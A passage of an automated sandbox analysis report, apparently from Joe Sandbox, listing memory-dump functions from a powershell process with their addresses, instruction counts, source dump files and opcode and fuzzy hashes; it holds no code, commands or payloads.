                                                                                          • Opcode ID: ce45415241e6ef24291f69102719ed1d5a80b00400f94d86f8f7fc85af670e74
                                                                                          • Instruction ID: 9b6a2bac3b43e7d451e85dd3b47e9c589801802802beaa59f9283f2dc0e05ae8
                                                                                          • Opcode Fuzzy Hash: ce45415241e6ef24291f69102719ed1d5a80b00400f94d86f8f7fc85af670e74
                                                                                          • Instruction Fuzzy Hash: 2D01F7724097049AE7108A29D9C0BA6BFDCEF55324F18C41AED488A142C7789881C6B1
                                                                                          Function 00A6DEC1 Relevance: .0, Instructions: 40COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 656936702b70dd6ee700c8ab751795cd109d669ecdc7943fea24702958871975
                                                                                          • Instruction ID: a8d067d5b0aaf4536c2498adc615e68b8f4980e847bb42805bf4b6702d036641
                                                                                          • Opcode Fuzzy Hash: 656936702b70dd6ee700c8ab751795cd109d669ecdc7943fea24702958871975
                                                                                          • Instruction Fuzzy Hash: 9BF05E393082414F87019B2DE4588A6BFFADFCB72432901ABE445CF762CA61DC4687A0
                                                                                          Function 00A67958 Relevance: .0, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1954d2dbc1ba5b9c6236f71bbf7f3196575513e0e5c794302bfa4d8f4dde1cc6
                                                                                          • Instruction ID: dd1c8390e93f301cf8785be4636019218001bd8ac8ab3f95efc285cbff36ce83
                                                                                          • Opcode Fuzzy Hash: 1954d2dbc1ba5b9c6236f71bbf7f3196575513e0e5c794302bfa4d8f4dde1cc6
                                                                                          • Instruction Fuzzy Hash: 0EF059727056005FCB118769ED84AAF7BF9EF88361F00092DE00AC3341DE309C4587A0
                                                                                          Function 0081D9A7 Relevance: .0, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1911719534.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_81d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3479be1f92443b2df50287834c742bc06f71faf4b8e50eae04c36be238c5e1ee
                                                                                          • Instruction ID: 149c420f83aac9eb25936726ebe000222722b291b0ca94f8a54681b90f9d6823
                                                                                          • Opcode Fuzzy Hash: 3479be1f92443b2df50287834c742bc06f71faf4b8e50eae04c36be238c5e1ee
                                                                                          • Instruction Fuzzy Hash: ADF0F976600604AF97208F0AD985C63FBEDFFD4770719C55AE84A8B612C671FC41CAA0
                                                                                          Function 0081D01C Relevance: .0, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1911719534.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_81d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2abcf0d6cc3f243e5a0344644c949e493378a92e6f0e65f6c27d8313c5444b0d
                                                                                          • Instruction ID: efeba2fa1deb82a0f6af3197a227e7f0b2a15660014f6fbedd9380c9f490f885
                                                                                          • Opcode Fuzzy Hash: 2abcf0d6cc3f243e5a0344644c949e493378a92e6f0e65f6c27d8313c5444b0d
                                                                                          • Instruction Fuzzy Hash: F5F0C272405744AEE7108A19C9C4BA2FFDCEF55334F18C45AED488E282C379A881CAB0
                                                                                          Function 00A690D8 Relevance: .0, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0a665fb05d647e16beaf71f0d36a0658305afe62a7f60fa3be0022e6b3abbf81
                                                                                          • Instruction ID: a409afc22e9662c014105462f82e8d6e404e1af8f78c3755607bf98eaa3eab7c
                                                                                          • Opcode Fuzzy Hash: 0a665fb05d647e16beaf71f0d36a0658305afe62a7f60fa3be0022e6b3abbf81
                                                                                          • Instruction Fuzzy Hash: 02F0F0B56082008FD3016B78A0153EB3B72DFC0318F61826BD6418B29ACE3A1A4A8792
                                                                                          Function 00A69158 Relevance: .0, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a007613120ae2db2016c66ac89d9b3ab66f19954484dbe2530c6ab07beb8c640
                                                                                          • Instruction ID: 0ca7029ed6c36814bc440d236c4af6381ac26caa571e4a089e20f5e1d9dab767
                                                                                          • Opcode Fuzzy Hash: a007613120ae2db2016c66ac89d9b3ab66f19954484dbe2530c6ab07beb8c640
                                                                                          • Instruction Fuzzy Hash: C8F0B47550A3104FC3609BBDE4993E67FE9FB41320F10486AD24DC7241DB3929858BA1
                                                                                          Function 00A68969 Relevance: .0, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2fd6a4d2ef720080dd06e141d8cc19fdec10e42e092611897913d590f1de7cb3
                                                                                          • Instruction ID: e6701959f59527f601f6d9366e8faaee552da2ea9905a2aefdb9836022c7b0ca
                                                                                          • Opcode Fuzzy Hash: 2fd6a4d2ef720080dd06e141d8cc19fdec10e42e092611897913d590f1de7cb3
                                                                                          • Instruction Fuzzy Hash: 79F0A73A3093545BC7062775B8192EE7F69AFC6724F04016BE605C7282CE69094683E5
                                                                                          Function 0081D998 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1911719534.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_81d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2c2b06cf1d642cb43a2c0226bf046f28cb1670b00dd9c8ed9e0e301c14a5f073
                                                                                          • Instruction ID: a48926101545c127e699688a48d9f6cc5807211ba933307d9734f73f79127975
                                                                                          • Opcode Fuzzy Hash: 2c2b06cf1d642cb43a2c0226bf046f28cb1670b00dd9c8ed9e0e301c14a5f073
                                                                                          • Instruction Fuzzy Hash: 46F0F975504A40AFD725CF06C985D63BBB9FFC5764B298489A84A8B712C671FC42CBA0
                                                                                          Function 00A67968 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b0a0a6d682021b484fdb47762b35fe1f1b46209b4d1c812aff6735119fdf5134
                                                                                          • Instruction ID: 0265a814cd79e20eae0a9bc36217c0d8ae0261598f56f406bb1bc8742baa6597
                                                                                          • Opcode Fuzzy Hash: b0a0a6d682021b484fdb47762b35fe1f1b46209b4d1c812aff6735119fdf5134
                                                                                          • Instruction Fuzzy Hash: A1F0A0727006149FC7159B6AE984AAFBBE9EB88771B00092DF50AC3340DF71AD8187A0
                                                                                          Function 00A690E8 Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 547ef007ecb6ad19190db3ebd3e9471c9c172cbdccd33f381621e7983cabe950
                                                                                          • Instruction ID: a38b1182194d40b4a58ca5adc25918da0ffa91e25a61d7233da76c9dd1c790cc
                                                                                          • Opcode Fuzzy Hash: 547ef007ecb6ad19190db3ebd3e9471c9c172cbdccd33f381621e7983cabe950
                                                                                          • Instruction Fuzzy Hash: 41F027B17001089BD300AB69D0163EB77AADFC0318F10812AD90947389CE3A2D42C7D1
                                                                                          Function 00A67697 Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f0d4dae03cb5f23a738eab2fe51f1616b960d59737ef178997ffc360efb83955
                                                                                          • Instruction ID: 62e8626e998ac2b3e74b32c163d6c059b64e05902240b866f02b39a14bb8caea
                                                                                          • Opcode Fuzzy Hash: f0d4dae03cb5f23a738eab2fe51f1616b960d59737ef178997ffc360efb83955
                                                                                          • Instruction Fuzzy Hash: 81F08C797105048FCB008BACD840A9A7BA6EFC87557054159E909CB314EF24CC028B91
                                                                                          Function 00A6DED0 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e73048443dc5832ed6a36b099458cb31627322f71601ec7e7fa004dfe47c73b1
                                                                                          • Instruction ID: 7ff4f3b4024bec479d3ea5988e2127d39ef6bc627268d37f675eb14fc19daebb
                                                                                          • Opcode Fuzzy Hash: e73048443dc5832ed6a36b099458cb31627322f71601ec7e7fa004dfe47c73b1
                                                                                          • Instruction Fuzzy Hash: 93E0E5397102118F87109B1DD498C66BBFAEFCEB6532910AAE549DF725DA61EC018B90
                                                                                          Function 00A69168 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0a6ff1c875d91d851d06f6784c300ce3fb8dae3cf84c537b00cc50dce0c59575
                                                                                          • Instruction ID: bca8f9af9b8866e1f3decaa5ac13c713d941946ed8f33758170c218b8c5b66da
                                                                                          • Opcode Fuzzy Hash: 0a6ff1c875d91d851d06f6784c300ce3fb8dae3cf84c537b00cc50dce0c59575
                                                                                          • Instruction Fuzzy Hash: 87F06D709013144BD3609BB9E89D39B7BE9FF44310F004829E61ED3340DB3969808B90
                                                                                          Function 00A6AF88 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8ee094059b6a627412da14f1e27cb6abf9eee6d457b90054bd503fb9c3b42ffa
                                                                                          • Instruction ID: 9d3b64ce7b53f981be75d55f609fa0e067cda2bac23f0f2e9b2c89661240b322
                                                                                          • Opcode Fuzzy Hash: 8ee094059b6a627412da14f1e27cb6abf9eee6d457b90054bd503fb9c3b42ffa
                                                                                          • Instruction Fuzzy Hash: 3FE0EC7630C3914F8B57D16978600F59F738AE236032985B7F185DF286DD26894A4BA3
                                                                                          Function 00A68800 Relevance: .0, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c1448a23bd765d03bec12f59439509a634085339c23cff10ea0fc7e1d3693248
                                                                                          • Instruction ID: d8afeb3be606ed9c4347689e2cbfa49310ac7236e1285d5684905a97fb056ce8
                                                                                          • Opcode Fuzzy Hash: c1448a23bd765d03bec12f59439509a634085339c23cff10ea0fc7e1d3693248
                                                                                          • Instruction Fuzzy Hash: 96E0DF3A90920A8FCB04DBB9E8464FABFB8AB44304F104226D949C3740DA314896CBC1
                                                                                          Function 00A68978 Relevance: .0, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1f028ab3a2541afd4595369f3147c5c986469d1380868f2881e938551029ad1d
                                                                                          • Instruction ID: 9ca6d44a364a770775204b36349e4d2f772fadae91e8fa5789edbb9dcaa99de0
                                                                                          • Opcode Fuzzy Hash: 1f028ab3a2541afd4595369f3147c5c986469d1380868f2881e938551029ad1d
                                                                                          • Instruction Fuzzy Hash: 37E0DF3530422047CB09377AA80D2AF7A6EFFC5724F00002AE70A83381CF68090183D9
                                                                                          Function 00A6F460 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: af4ced701223cc96640d2c2ea822134442dbefab37ccc3e02138af82df1bbf12
                                                                                          • Instruction ID: 7439a32059da8bc25e0bb500ed90e7a8fab4199580e356c360784495ce7866c9
                                                                                          • Opcode Fuzzy Hash: af4ced701223cc96640d2c2ea822134442dbefab37ccc3e02138af82df1bbf12
                                                                                          • Instruction Fuzzy Hash: AAE01270D4420A9F8B90EF7C98415AEFBF4EB49300F2084AEC948D7611E7329A12CBD1
                                                                                          Function 00A69550 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 634c372dd2118966c953f7046e9e8ac0b2719c0793d6060cd9fad908e7eaa1b1
                                                                                          • Instruction ID: 02b2f326f0eecebd0e749b0f1a5f206010abe9652df5cd1846788b402f12a84f
                                                                                          • Opcode Fuzzy Hash: 634c372dd2118966c953f7046e9e8ac0b2719c0793d6060cd9fad908e7eaa1b1
                                                                                          • Instruction Fuzzy Hash: E6D0A7A27031252746B571FE1A126FB91EF8FC46A47060236EA0AC7343EC64CC0243F1
                                                                                          Function 00A6DD20 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 06ca9e6893f3ab49f50721f3e45d2187719a0aadb533a5ca3d3ee5c0eb6d857d
                                                                                          • Instruction ID: f4946a11ffd3835d55c52e44f997664a2a17ec72243b0a33f0a998d84ac0abb5
                                                                                          • Opcode Fuzzy Hash: 06ca9e6893f3ab49f50721f3e45d2187719a0aadb533a5ca3d3ee5c0eb6d857d
                                                                                          • Instruction Fuzzy Hash: 2AE0C231701A14578225A62EA81089F7BEBEFC97B1315492EE009C7740DE68DD0247E6
                                                                                          Function 00A6DD70 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction ID: b7e6e44e08465fbf712b8076f11592dfa8e95a24ddbb545f811cf567a320a972
                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction Fuzzy Hash: 8EE08C32B00018A78B0896A9D8504E9FBBADFCC360F14847ED90AAB340DA32691686E1
                                                                                          Function 00A68739 Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fc4ff1e98864594475c1207490ca4cab831da2fd096e82848a185ddc62685007
                                                                                          • Instruction ID: 1b103983c2225904d0a5d620bd540d6aaf3512d44bca6994508b3b3c3d42da32
                                                                                          • Opcode Fuzzy Hash: fc4ff1e98864594475c1207490ca4cab831da2fd096e82848a185ddc62685007
                                                                                          • Instruction Fuzzy Hash: C7E0EC39849119CFCB09DBA5E44A4FEBF38FF10315B1002AAD603D2690DA35498ACB81
                                                                                          Function 00A69549 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 802eb9098df4ce3cd8916d813a9de8660c96629b065ec6320cfc115728a429e7
                                                                                          • Instruction ID: 51effa2297e811150f27b5d604dd77df1a2020b3ee31553de0969b8604a1f124
                                                                                          • Opcode Fuzzy Hash: 802eb9098df4ce3cd8916d813a9de8660c96629b065ec6320cfc115728a429e7
                                                                                          • Instruction Fuzzy Hash: 77D0C7A57431251655A561BD16512FF45FF4BC429970542369A0BC7647ED28CC0643D2
                                                                                          Function 00A6F470 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction ID: 614e2d37fa3c217e4662ae88352d12b8e3f74d9a51dd4072997f21d1a235a733
                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction Fuzzy Hash: 98D067B0D042099F8780EFADD94156EFBF4EB48300F6085BA8919E7301EB329A12CBD5
                                                                                          Function 00A68748 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 396455b3a3c97d84fb7ecb04b5e93ebe3061022a02cd6157d1bd8fdde51f2f81
                                                                                          • Instruction ID: a646afb78b383682faf5b142b2eec5f49225a11762ab9b7b94bd80ffa7c78232
                                                                                          • Opcode Fuzzy Hash: 396455b3a3c97d84fb7ecb04b5e93ebe3061022a02cd6157d1bd8fdde51f2f81
                                                                                          • Instruction Fuzzy Hash: 7CD06731C05119CBCB0DABA5E85B4BEBF78FF14301F504269DB17922A0EE351A5ACAC5
                                                                                          Function 00A68810 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d5f8f2e39e9a634382730aff8268b36b377faa0ef7e2d01825c537799943e7c7
                                                                                          • Instruction ID: 6616b095ee2ee3dd7b47a49e8de04c20749221dc7e4e5d7967b7057f1cb83471
                                                                                          • Opcode Fuzzy Hash: d5f8f2e39e9a634382730aff8268b36b377faa0ef7e2d01825c537799943e7c7
                                                                                          • Instruction Fuzzy Hash: 9BD01734A0920A8BCB18EFA5E84686EBFB8AB44300F004269DA49D3340EA345801CBC1
                                                                                          Function 00A67932 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f9eff77a2f1817733da317683f92a2d6e2524fe615cad9780c0f67ba1fef44eb
                                                                                          • Instruction ID: 1a6a4b5dc63554f4974232d6b65d07e33dab5f952929c7d9f425d9ad105a27c0
                                                                                          • Opcode Fuzzy Hash: f9eff77a2f1817733da317683f92a2d6e2524fe615cad9780c0f67ba1fef44eb
                                                                                          • Instruction Fuzzy Hash: 9ED012754493849BDB164F7494C89083F65AB02251B0408DCD8464A2A7C976C044CF00
                                                                                          Function 00A67EA0 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6cbed8a3914373d164d7eed41b1aab07d520e18063a7c562925548c16c6eb33c
                                                                                          • Instruction ID: 433bc7a7628262249bbed87eea1733dd9d3adfbd2d38e7f67250e94a6b0df6c0
                                                                                          • Opcode Fuzzy Hash: 6cbed8a3914373d164d7eed41b1aab07d520e18063a7c562925548c16c6eb33c
                                                                                          • Instruction Fuzzy Hash: 0EC04C759095904FEF49DA35896A7267B32A756601B0A819D808286854DD244006DA11
                                                                                          Function 00A67940 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3da6a90917eec73ff022b7428c0852d18bf466bbc8b97ad8f30787364fa09639
                                                                                          • Instruction ID: 88ea6655bf333b1a47c2532482cfec87370346e4dab0d0f8a03cdb0243447d9b
                                                                                          • Opcode Fuzzy Hash: 3da6a90917eec73ff022b7428c0852d18bf466bbc8b97ad8f30787364fa09639
                                                                                          • Instruction Fuzzy Hash: 65B092301497088FC2496F75A448819736DAB4061538008ACE80E0A2A78E76E884CA44
                                                                                          Function 00A6BD50 Relevance: .0, Instructions: 6COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 166eb40100b767039727876dd59c1b589896e25836259629544c3c3194d76e45
                                                                                          • Instruction ID: 8409278bec7055e1a9ce81f72878b2db873a7fbef9f9ba59f8b11b599b1061ea
                                                                                          • Opcode Fuzzy Hash: 166eb40100b767039727876dd59c1b589896e25836259629544c3c3194d76e45
                                                                                          • Instruction Fuzzy Hash: 06A002257533214AEB086F335A4927B3DDAABC05D2F4CC4B5F481C4195DE3DC1496615

                                                                                          Non-executed Functions

                                                                                          Function 072A3928 Relevance: 12.8, Strings: 10, Instructions: 320COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1954930567.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_72a0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq$l$l
                                                                                          • API String ID: 0-1448729859
                                                                                          • Opcode ID: 48ee3d37bd78bea2981755d982c4871bb34acf5b7c8d8c56d82b3a4a8aab26ce
                                                                                          • Instruction ID: 149753dc9a2b9f40c70ba57e290f08fcc93f5b44c127f1f99dd598d5204f62be
                                                                                          • Opcode Fuzzy Hash: 48ee3d37bd78bea2981755d982c4871bb34acf5b7c8d8c56d82b3a4a8aab26ce
